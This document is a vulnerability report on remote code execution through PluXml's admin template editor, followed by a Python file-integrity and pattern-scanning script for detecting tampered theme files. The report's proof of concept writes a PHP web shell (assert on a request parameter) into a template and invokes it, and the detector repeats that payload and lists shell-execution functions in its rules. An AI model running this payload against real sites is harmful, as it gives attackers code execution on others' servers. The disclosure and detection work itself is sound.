Closed
Description
The theme edit function /PluXml/core/admin/parametres_edittpl.php allows remote attackers to execute arbitrary PHP code by placing this code into a template.
PoC:
/PluXml/core/admin/parametres_edittpl.php [POST]token=603b37bed4a91d8b18a3507c46ae27df644a2ff4&template=%2Ftags.php&submit=Save+the+file&tpl=%2Ftags.php&content=%3C%3Fphp+assert%28%24_REQUEST%5B%27c%27%5D%29%3B%3F%3E%0D%0A

Then visit /PluXml/themes/defaut/tags.php?c=phpinfo();
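Because PluXml theme templates are PHP files, anyone who can save a template through the admin editor is writing executable code onto the server, which is exactly what the report above demonstrates. Two cheap defender-side controls catch that: a hash baseline of the theme directory taken when it is known-good, and a scan for code patterns that do not belong in a template (dynamic-code functions fed from request data). The script below is an added example, not code from the report or from the PluXml project; the theme directory, the two sample templates and the rule list are constructed for the demonstration, and the tampered file reuses the payload shown in the PoC so the detection can be checked against it.

```python
"""Baseline-and-scan check for a PHP theme directory (added example)."""
import hashlib
import os
import re
import tempfile

# Heuristic rules: dynamic-code or command functions reading request data,
# and any eval/assert call at all, which a real template has no use for.
RULES = [
    ("dynamic-code call fed from request data",
     re.compile(r"\b(assert|eval|system|passthru|shell_exec|exec|popen|proc_open)"
                r"\s*\(\s*\$_(REQUEST|GET|POST|COOKIE|SERVER)\b")),
    ("eval/assert call in template",
     re.compile(r"\b(eval|assert)\s*\(")),
]


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def php_files(theme_dir):
    """Yield (relative path, absolute path) for every .php file under theme_dir."""
    for root, _dirs, files in os.walk(theme_dir):
        for name in sorted(files):
            if name.endswith(".php"):
                full = os.path.join(root, name)
                yield os.path.relpath(full, theme_dir), full


def build_baseline(theme_dir):
    """Map relative path -> sha256, to be taken while the theme is known-good."""
    return {rel: sha256_of(full) for rel, full in php_files(theme_dir)}


def diff_against_baseline(theme_dir, baseline):
    """Report templates that changed, appeared or disappeared since the baseline."""
    current = build_baseline(theme_dir)
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def scan_for_suspicious_code(theme_dir):
    """Return (relative path, line number, rule name) for each line hitting a rule."""
    findings = []
    for rel, full in php_files(theme_dir):
        with open(full, encoding="utf-8", errors="replace") as f:
            for lineno, line in enumerate(f, 1):
                for rule_name, pattern in RULES:
                    if pattern.search(line):
                        findings.append((rel, lineno, rule_name))
                        break  # one finding per line is enough for triage
    return findings


def demo():
    """Constructed theme: baseline it clean, then overwrite tags.php with the PoC payload."""
    with tempfile.TemporaryDirectory() as theme_dir:
        def write(rel, data):
            with open(os.path.join(theme_dir, rel), "wb") as f:
                f.write(data)

        # Constructed, harmless templates standing in for a real theme.
        write("tags.php", b"<?php foreach ($tags as $t) { echo htmlspecialchars($t); } ?>\n")
        write("header.php", b"<!DOCTYPE html>\n<html><head><title>site</title></head>\n")
        baseline = build_baseline(theme_dir)
        clean_findings = scan_for_suspicious_code(theme_dir)

        # Simulate the reported tampering: the template body replaced by the PoC one-liner.
        write("tags.php", b"<?php assert($_REQUEST['c']);?>\r\n")
        return {
            "clean_findings": clean_findings,
            "diff": diff_against_baseline(theme_dir, baseline),
            "findings": scan_for_suspicious_code(theme_dir),
        }


if __name__ == "__main__":
    print(demo())
```

In production the baseline would be written at deploy time and the two checks run from cron or a file-integrity monitor; a non-empty "modified"/"added" list on a theme directory that nobody was supposed to touch is the signal, and the pattern scan tells the responder which file to look at first.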
